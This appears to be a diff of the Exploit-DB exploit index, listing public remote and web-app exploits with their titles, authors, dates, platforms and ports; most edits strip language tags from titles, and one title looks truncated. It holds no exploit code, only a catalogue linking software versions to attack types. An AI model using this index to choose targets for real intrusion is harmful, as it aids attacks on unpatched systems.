1915,exploits/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (1)",2006-06-15,c0rrupt,remote,windows,
1940,exploits/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)",2006-06-22,"H D Moore",remote,windows,445
1965,exploits/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)",2006-06-29,Pusscat,remote,windows,445
1997,exploits/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)",2006-07-09,joffer,remote,multiple,10000
1997,exploits/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure",2006-07-09,joffer,remote,multiple,10000
2014,exploits/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow",2006-07-15,"Pablo Isola",remote,windows,515
2017,exploits/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)",2006-07-15,UmZ,remote,multiple,10000
2017,exploits/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure",2006-07-15,UmZ,remote,multiple,10000
2034,exploits/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian _pagvac_ Pastor",remote,hardware,
2047,exploits/windows/remote/2047.pl,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (1)",2006-07-20,"Jacopo Cervini",remote,windows,
2048,exploits/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 - 'JBoss' Remote Code Execution",2006-07-20,"Jon Hart",remote,hardware,
@ -11757,7 +11757,7 @@ id,file,description,date,author,type,platform,port
2403,exploits/windows/remote/2403.c,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow",2006-09-20,nop,remote,windows,
2408,exploits/windows/remote/2408.pl,"Microsoft Internet Explorer (Windows XP SP1) - 'VML' Remote Buffer Overflow",2006-09-21,"Trirat Puttaraksa",remote,windows,
2425,exploits/windows/remote/2425.html,"Microsoft Internet Explorer (Windows XP SP2) - 'VML' Remote Buffer Overflow",2006-09-24,jamikazu,remote,windows,
2426,exploits/windows/remote/2426.pl,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",remote,windows,
2426,exploits/windows/remote/2426.pl,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2)",2006-09-25,"Trirat Puttaraksa",remote,windows,
2440,exploits/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)",2006-09-27,"H D Moore",remote,windows,
2445,exploits/windows/remote/2445.c,"NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow",2006-09-27,h07,remote,windows,80
2448,exploits/windows/remote/2448.html,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() (HTML)",2006-09-28,jamikazu,remote,windows,
@ -11787,7 +11787,7 @@ id,file,description,date,author,type,platform,port
2785,exploits/windows/remote/2785.c,"WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow",2006-11-15,prdelka,remote,windows,
2789,exploits/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,remote,windows,
2800,exploits/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)",2006-11-17,"S A Stevens",remote,windows,
2809,exploits/windows/remote/2809.py,"Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",remote,windows,445
2809,exploits/windows/remote/2809.py,"Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070)",2006-11-18,"Winny Thomas",remote,windows,445
2837,exploits/multiple/remote/2837.sql,"Oracle 9i/10g - 'read/write/execute' ation Suite",2006-11-23,"Marco Ivaldi",remote,multiple,
2856,exploits/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",remote,linux,21
2858,exploits/linux/remote/2858.c,"Evince Document Viewer - 'DocumentMedia' Remote Buffer Overflow",2006-11-28,K-sPecial,remote,linux,
@ -11854,7 +11854,7 @@ id,file,description,date,author,type,platform,port
3378,exploits/multiple/remote/3378.pl,"Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection (2)",2007-02-26,bunker,remote,multiple,
3380,exploits/windows/remote/3380.txt,"Kiwi CatTools TFTP 3.2.8 - Directory Traversal",2007-02-27,"Sergey Gordeychik",remote,windows,
3381,exploits/windows/remote/3381.pl,"NetProxy 4.03 - Web Filter Evasion / Bypass Logging",2007-02-27,"Craig Heffner",remote,windows,
3388,exploits/windows/remote/3388.pl,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode (Perl)",2007-02-28,"Umesh Wanve",remote,windows,69
3388,exploits/windows/remote/3388.pl,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode",2007-02-28,"Umesh Wanve",remote,windows,69
3389,exploits/linux/remote/3389.c,"Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow",2007-03-01,"Massimiliano Oldani",remote,linux,
3391,exploits/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-01,"Trirat Puttaraksa",remote,windows,
3395,exploits/windows/remote/3395.c,"WebMod 0.48 - Content-Length Remote Buffer Overflow",2007-03-01,cybermind,remote,windows,
@ -11866,8 +11866,8 @@ id,file,description,date,author,type,platform,port
3452,exploits/multiple/remote/3452.php,"PHP 5.2.0 - EXT/Filter FDF Post Filter Bypass",2007-03-10,"Stefan Esser",remote,multiple,
3462,exploits/windows/remote/3462.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (1)",2007-03-12,Marsu,remote,windows,
3463,exploits/windows/remote/3463.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (2)",2007-03-12,Marsu,remote,windows,
3474,exploits/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python)",2007-03-14,"Winny Thomas",remote,windows,21
3482,exploits/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Perl)",2007-03-15,"Umesh Wanve",remote,windows,21
3474,exploits/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow",2007-03-14,"Winny Thomas",remote,windows,21
3482,exploits/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow",2007-03-15,"Umesh Wanve",remote,windows,21
3491,exploits/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution",2007-03-15,"Core Security",remote,bsd,
3495,exploits/windows/remote/3495.txt,"CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow",2007-03-16,"Winny Thomas",remote,windows,6503
3531,exploits/windows/remote/3531.py,"Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow",2007-03-21,"Winny Thomas",remote,windows,554
@ -12091,7 +12091,7 @@ id,file,description,date,author,type,platform,port
4745,exploits/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)",2007-12-18,axis,remote,windows,
4746,exploits/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,remote,windows,
4747,exploits/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - 'ulang' Remote Command Execution",2007-12-18,rgod,remote,windows,
4754,exploits/windows_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",remote,windows_x86,3128
4754,exploits/windows_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow",2007-12-18,"Marcin Kozlowski",remote,windows_x86,3128
4760,exploits/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)",2007-12-21,"Andres Tarasco",remote,windows,
4761,exploits/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,remote,multiple,25
4784,exploits/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",remote,windows,80
@ -12198,12 +12198,12 @@ id,file,description,date,author,type,platform,port
5563,exploits/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow",2008-05-08,tixxDZ,remote,windows,69
5612,exploits/windows/remote/5612.html,"idautomation bar code - ActiveX Multiple Vulnerabilities",2008-05-14,shinnai,remote,windows,
5619,exploits/windows/remote/5619.html,"Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting",2008-05-14,"Aviv Raff",remote,windows,
5622,exploits/linux/remote/5622.txt,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Perl)",2008-05-15,"Markus Mueller",remote,linux,22
5622,exploits/linux/remote/5622.txt,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH",2008-05-15,"Markus Mueller",remote,linux,22
5632,exploits/linux/remote/5632.rb,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)",2008-05-16,L4teral,remote,linux,22
5681,exploits/windows/remote/5681.html,"Creative Software AutoUpdate Engine - ActiveX Stack Overflow",2008-05-27,BitKrush,remote,windows,
5694,exploits/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow",2008-05-29,Heretic2,remote,windows,623
5695,exploits/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow",2008-05-29,Heretic2,remote,windows,8800
5720,exploits/linux/remote/5720.py,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Python)",2008-06-01,"WarCat team",remote,linux,22
5720,exploits/linux/remote/5720.py,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH",2008-06-01,"WarCat team",remote,linux,22
5732,exploits/windows/remote/5732.html,"C6 Messenger - ActiveX Remote Download and Execute",2008-06-03,Nine:Situations:Group,remote,windows,
5738,exploits/windows/remote/5738.rb,"HP StorageWorks - NSI Double Take Remote Overflow (Metasploit)",2008-06-04,ri0t,remote,windows,1100
5741,exploits/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download",2008-06-04,cocoruder,remote,windows,
@ -12221,15 +12221,15 @@ id,file,description,date,author,type,platform,port
6004,exploits/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",remote,windows,
6012,exploits/windows/remote/6012.php,"Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,remote,windows,80
6013,exploits/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,remote,osx,
6045,exploits/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)",2008-07-12,muts,remote,linux,80
6045,exploits/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution",2008-07-12,muts,remote,linux,80
6089,exploits/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,remote,windows,80
6094,exploits/linux/remote/6094.txt,"Debian OpenSSH - (Authenticated) Remote SELinux Privilege Escalation",2008-07-17,eliteboy,remote,linux,
6100,exploits/windows_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,remote,windows_x86,80
6116,exploits/windows/remote/6116.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-22,"Guido Landi",remote,windows,
6118,exploits/windows/remote/6118.pl,"IntelliTamper 2.07 - server header Remote Code Execution",2008-07-22,Koshi,remote,windows,
6121,exploits/windows/remote/6121.c,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (C)",2008-07-23,r0ut3r,remote,windows,
6121,exploits/windows/remote/6121.c,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-23,r0ut3r,remote,windows,
6122,exploits/multiple/remote/6122.rb,"BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning (Metasploit)",2008-07-23,I)ruid,remote,multiple,
6123,exploits/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning (Python)",2008-07-24,"Julien Desfossez",remote,multiple,
6123,exploits/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning",2008-07-24,"Julien Desfossez",remote,multiple,
6124,exploits/windows/remote/6124.c,"Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote File Download",2008-07-24,callAX,remote,windows,
6130,exploits/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning",2008-07-25,"Marc Bevand",remote,multiple,
6151,exploits/windows/remote/6151.txt,"Velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,remote,windows,
@ -12376,7 +12376,7 @@ id,file,description,date,author,type,platform,port
8041,exploits/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure",2009-02-11,"Dejan Levaja",remote,windows,
8059,exploits/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption",2009-02-16,Nine:Situations:Group,remote,windows,
8079,exploits/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)",2009-02-20,Abysssec,remote,windows,
8080,exploits/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",remote,windows,
8080,exploits/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-02-20,"David Kennedy (ReL1K)",remote,windows,
8082,exploits/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)",2009-02-20,webDEViL,remote,windows,
8096,exploits/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting",2009-02-23,"Rizki Wicaksono",remote,hardware,
8097,exploits/multiple/remote/8097.txt,"MLdonkey 2.9.7 - Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",remote,multiple,
@ -12387,7 +12387,7 @@ id,file,description,date,author,type,platform,port
8144,exploits/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution",2009-03-03,Elazar,remote,windows,
8149,exploits/windows/remote/8149.txt,"EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,remote,windows,
8152,exploits/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-03-04,"Ahmed Obied",remote,windows,
8154,exploits/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,remote,windows,80
8154,exploits/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow",2009-03-04,Dr4sH,remote,windows,80
8155,exploits/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 - File Disclosure",2009-03-04,Stack,remote,windows,
8160,exploits/windows/remote/8160.html,"SupportSoft DNA Editor Module - 'dnaedit.dll' Code Execution",2009-03-05,Nine:Situations:Group,remote,windows,
8173,exploits/windows/remote/8173.txt,"Belkin BullDog Plus - UPS-Service Buffer Overflow",2009-03-09,Elazar,remote,windows,
@ -12456,7 +12456,7 @@ id,file,description,date,author,type,platform,port
8754,exploits/windows/remote/8754.patch,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",remote,windows,
8757,exploits/windows/remote/8757.html,"BaoFeng - 'config.dll' ActiveX Remote Code Execution",2009-05-21,etirah,remote,windows,
8758,exploits/windows/remote/8758.html,"ChinaGames - 'CGAgent.dll' ActiveX Remote Code Execution",2009-05-21,etirah,remote,windows,
8765,exploits/windows/remote/8765.php,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)",2009-05-22,racle,remote,windows,
8765,exploits/windows/remote/8765.php,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass",2009-05-22,racle,remote,windows,
8786,exploits/multiple/remote/8786.txt,"Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure",2009-05-26,venatir,remote,multiple,
8804,exploits/windows/remote/8804.py,"Soulseek 157 NS - Remote Buffer Overflow (SEH)",2009-05-26,His0k4,remote,windows,2242
8806,exploits/windows/remote/8806.pl,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)",2009-05-26,ka0x,remote,windows,
@ -12662,7 +12662,7 @@ id,file,description,date,author,type,platform,port
10973,exploits/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,remote,windows,
10980,exploits/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behaviour Vulnerabilities",2010-01-04,emgent,remote,linux,
11022,exploits/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow",2010-01-06,"His0k4 & Simo36",remote,novell,
11027,exploits/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)",2010-01-06,jacky,remote,windows,
11027,exploits/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow",2010-01-06,jacky,remote,windows,
11059,exploits/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x & D3V!L FUCKER",remote,windows,
11138,exploits/windows/remote/11138.c,"Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow",2010-01-14,Simo36,remote,windows,
11151,exploits/windows/remote/11151.html,"Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution",2010-01-16,"germaya_x & D3V!L FUCKER",remote,windows,
@ -17268,7 +17268,7 @@ id,file,description,date,author,type,platform,port
37400,exploits/windows/remote/37400.php,"Havij - OLE Automation Array Remote Code Execution",2015-06-27,"Mohammad Reza Espargham",remote,windows,
37429,exploits/hardware/remote/37429.txt,"Juniper Networks Mobility System Software - '/aaa/wba_login.html' Cross-Site Scripting",2012-06-14,"Craig Lambert",remote,hardware,
37405,exploits/hardware/remote/37405.py,"Edimax IC-3030iWn - UDP Packet Password Information Disclosure",2012-06-14,y3dips,remote,hardware,
37426,exploits/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python)",2015-06-29,"Ben Lincoln",remote,cgi,
37426,exploits/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection",2015-06-29,"Ben Lincoln",remote,cgi,
37428,exploits/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)",2015-06-29,"Ben Lincoln",remote,cgi,
37564,exploits/hardware/remote/37564.txt,"Barracuda Email Security Service - Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",remote,hardware,
37448,exploits/multiple/remote/37448.rb,"Adobe Flash Player - Drawing Fill Shader Memory Corruption (Metasploit)",2015-06-30,Metasploit,remote,multiple,
@ -18402,8 +18402,8 @@ id,file,description,date,author,type,platform,port
737,exploits/php/webapps/737.txt,"QwikiWiki - Directory Traversal",2005-01-04,Madelman,webapps,php,
740,exploits/php/webapps/740.pl,"phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista",2005-01-04,"Severino Honorato",webapps,php,
754,exploits/php/webapps/754.pl,"ITA Forum 1.49 - SQL Injection",2005-01-13,RusH,webapps,php,
772,exploits/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (C)",2005-01-25,THUNDER,webapps,cgi,
773,exploits/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (Perl)",2005-01-25,GHC,webapps,cgi,
772,exploits/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution",2005-01-25,THUNDER,webapps,cgi,
773,exploits/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution",2005-01-25,GHC,webapps,cgi,
774,exploits/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition",2005-01-25,"Noam Rathaus",webapps,php,
786,exploits/php/webapps/786.pl,"LiteForum 2.1.1 - SQL Injection",2005-02-04,RusH,webapps,php,
790,exploits/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,webapps,cgi,
@ -18432,7 +18432,7 @@ id,file,description,date,author,type,platform,port
881,exploits/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,webapps,php,
889,exploits/php/webapps/889.pl,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,webapps,php,
892,exploits/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass",2005-03-21,kre0n,webapps,php,
897,exploits/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,webapps,php,
897,exploits/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-24,str0ke,webapps,php,
901,exploits/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass",2005-03-29,RusH,webapps,php,
907,exploits/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Get Hash",2005-04-02,CereBrums,webapps,php,
910,exploits/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Get Hash",2005-04-04,CereBrums,webapps,php,
@ -18452,13 +18452,13 @@ id,file,description,date,author,type,platform,port
1004,exploits/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution (2)",2005-05-20,Nikyt0x,webapps,cgi,
1005,exploits/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution (1)",2005-05-20,Alpha_Programmer,webapps,cgi,
1006,exploits/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - 'register.php' SQL Injection",2005-05-20,deluxe89,webapps,php,
1010,exploits/asp/webapps/1010.pl,"Maxwebportal 1.36 - 'Password.asp' Change Password (3) (Perl)",2005-05-26,Alpha_Programmer,webapps,asp,
1011,exploits/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password (2) (PHP)",2005-05-26,mh_p0rtal,webapps,asp,
1010,exploits/asp/webapps/1010.pl,"Maxwebportal 1.36 - 'Password.asp' Change Password (3)",2005-05-26,Alpha_Programmer,webapps,asp,
1011,exploits/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password (2)",2005-05-26,mh_p0rtal,webapps,asp,
1012,exploits/asp/webapps/1012.txt,"Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)",2005-05-26,"Soroush Dalili",webapps,asp,
1013,exploits/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",webapps,php,
1014,exploits/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)",2005-05-27,"Danica Jones",webapps,php,
1015,exploits/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - User Registration (3)",2005-05-27,"Soroush Dalili",webapps,asp,
1016,exploits/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass (Perl)",2005-05-30,Alpha_Programmer,webapps,php,
1016,exploits/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass",2005-05-30,Alpha_Programmer,webapps,php,
1017,exploits/php/webapps/1017.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (1)",2005-05-30,mh_p0rtal,webapps,php,
1018,exploits/php/webapps/1018.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (2)",2005-05-30,Nikyt0x,webapps,php,
1020,exploits/php/webapps/1020.c,"ZeroBoard 4.1 - 'preg_replace' Remote Nobody Shell",2005-05-31,n0gada,webapps,php,
@ -18558,7 +18558,7 @@ id,file,description,date,author,type,platform,port
1356,exploits/php/webapps/1356.php,"DoceboLms 2.0.4 - 'connector.php' Arbitrary File Upload",2005-12-04,rgod,webapps,php,
1358,exploits/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Command Execution",2005-12-06,rgod,webapps,php,
1359,exploits/php/webapps/1359.php,"SugarSuite Open Source 4.0beta - Remote Code Execution (1)",2005-12-07,rgod,webapps,php,
1361,exploits/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Command Execution (C)",2005-12-07,unitedasia,webapps,php,
1361,exploits/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Command Execution",2005-12-07,unitedasia,webapps,php,
1363,exploits/php/webapps/1363.php,"Website Baker 2.6.0 - Authentication Bypass / Remote Code Execution",2005-12-08,rgod,webapps,php,
1364,exploits/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,webapps,php,
1367,exploits/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Command Execution",2005-12-10,rgod,webapps,php,
@ -18875,8 +18875,8 @@ id,file,description,date,author,type,platform,port
1933,exploits/php/webapps/1933.txt,"BandSite CMS 1.1.1 - 'ROOT_PATH' Remote File Inclusion",2006-06-20,Kw3[R]Ln,webapps,php,
1934,exploits/php/webapps/1934.txt,"dotProject 2.0.3 - 'baseDir' Remote File Inclusion",2006-06-20,h4ntu,webapps,php,
1936,exploits/php/webapps/1936.txt,"SmartSite CMS 1.0 - 'root' Remote File Inclusion",2006-06-20,Archit3ct,webapps,php,
1938,exploits/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection (Perl)",2006-06-21,RusH,webapps,php,
1939,exploits/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection (PHP)",2006-06-21,RusH,webapps,php,
1938,exploits/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection",2006-06-21,RusH,webapps,php,
1939,exploits/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection",2006-06-21,RusH,webapps,php,
1941,exploits/php/webapps/1941.php,"Mambo 4.6rc1 - Weblinks Blind SQL Injection (2)",2006-06-22,rgod,webapps,php,
1942,exploits/php/webapps/1942.txt,"ralf image Gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,webapps,php,
1943,exploits/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,webapps,php,
@ -19331,7 +19331,7 @@ id,file,description,date,author,type,platform,port
2551,exploits/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 - Remote File Inclusion",2006-10-13,bd0rk,webapps,php,
2552,exploits/php/webapps/2552.pl,"phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php,
2553,exploits/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,webapps,php,
2554,exploits/php/webapps/2554.php,"cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",webapps,php,
2554,exploits/php/webapps/2554.php,"cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation",2006-10-13,"Nima Salehi",webapps,php,
2555,exploits/php/webapps/2555.txt,"CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion",2006-10-14,Kw3[R]Ln,webapps,php,
2556,exploits/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,webapps,php,
2557,exploits/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,webapps,php,
@ -21734,8 +21734,8 @@ id,file,description,date,author,type,platform,port
6049,exploits/php/webapps/6049.txt,"Maian Gallery 2.0 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php,
6050,exploits/php/webapps/6050.txt,"Maian Greetings 2.1 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php,
6051,exploits/php/webapps/6051.txt,"Maian Music 1.0 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php,
6053,exploits/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (PHP)",2008-07-12,"Inphex & real",webapps,php,
6054,exploits/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (Perl)",2008-07-12,"Inphex & real",webapps,php,
6053,exploits/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution",2008-07-12,"Inphex & real",webapps,php,
6054,exploits/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution",2008-07-12,"Inphex & real",webapps,php,
